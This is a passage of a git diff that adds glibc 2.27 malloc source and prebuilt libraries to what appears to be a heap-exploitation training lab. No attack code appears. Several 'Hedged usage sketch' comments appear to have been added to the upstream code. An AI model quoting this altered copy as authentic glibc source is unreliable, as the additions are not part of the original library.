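+       for (int i = 0; i < 64; i++)
+         free (p[i]);
+       printf ("malloc_trim(0) = %d\n", malloc_trim (0));
+       return 0;
+     }
+*/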
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
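+
+/* Hedged usage sketch: the reported size is the full usable payload of
+   the underlying chunk, so it is at least what was requested (often a
+   little more due to rounding):
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *p = malloc (100);
+       printf ("requested 100, usable %zu\n", malloc_usable_size (p));
+       free (p);
+       return 0;
+     }
+*/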
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
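+
+/* Hedged usage sketch: the accumulated counters are exposed through
+   mallinfo() from <malloc.h>.  Note the fields are plain ints, so they
+   can wrap on large heaps:
+
+     #include <malloc.h>
+     #include <stdio.h>
+     int main (void)
+     {
+       struct mallinfo mi = mallinfo ();
+       printf ("arena=%d in use=%d free=%d mmapped=%d\n",
+               mi.arena, mi.uordblks, mi.fordblks, mi.hblkhd);
+       return 0;
+     }
+*/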
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
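+
+/* Hedged usage sketch: most mallopt parameters map onto one of the
+   do_set_* helpers above.  The constants come from <malloc.h>; the call
+   returns 1 on success and 0 when a value is rejected (e.g. an
+   M_MMAP_THRESHOLD above HEAP_MAX_SIZE / 2):
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       // serve requests of 1 MiB and up with mmap instead of the heap
+       int ok = mallopt (M_MMAP_THRESHOLD, 1024 * 1024);
+       printf ("mallopt returned %d\n", ok);
+       void *p = malloc (2 * 1024 * 1024);   // expected to be mmapped
+       free (p);
+       return 0;
+     }
+*/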
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
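+
+/* Hedged usage sketch of the validation above: the alignment must be a
+   power-of-two multiple of sizeof (void *); anything else yields EINVAL
+   and leaves *memptr untouched:
+
+     #include <errno.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *p = NULL;
+       int rc = posix_memalign (&p, 24, 100);   // 24 is not a power of two
+       printf ("rc=%d (EINVAL=%d) p=%p\n", rc, EINVAL, p);
+       rc = posix_memalign (&p, 64, 100);       // valid alignment
+       printf ("rc=%d p=%p\n", rc, p);
+       free (p);
+       return 0;
+     }
+*/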
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
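+
+/* Hedged usage sketch: dump the per-arena XML statistics produced above
+   to any stdio stream (the format is glibc-specific and may change):
+
+     #include <malloc.h>
+     #include <stdio.h>
+     int main (void)
+     {
+       return malloc_info (0, stdout);   // options must currently be 0
+     }
+*/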
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so
new file mode 100755
index 0000000..cff7bd2
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2
new file mode 120000
index 0000000..2ffc93b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so
new file mode 100755
index 0000000..a6732c1
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6
new file mode 120000
index 0000000..aa8ad7a
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..f8e7250
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c
@@ -0,0 +1,5607 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., the number of extra bytes
+       allocated beyond what was requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
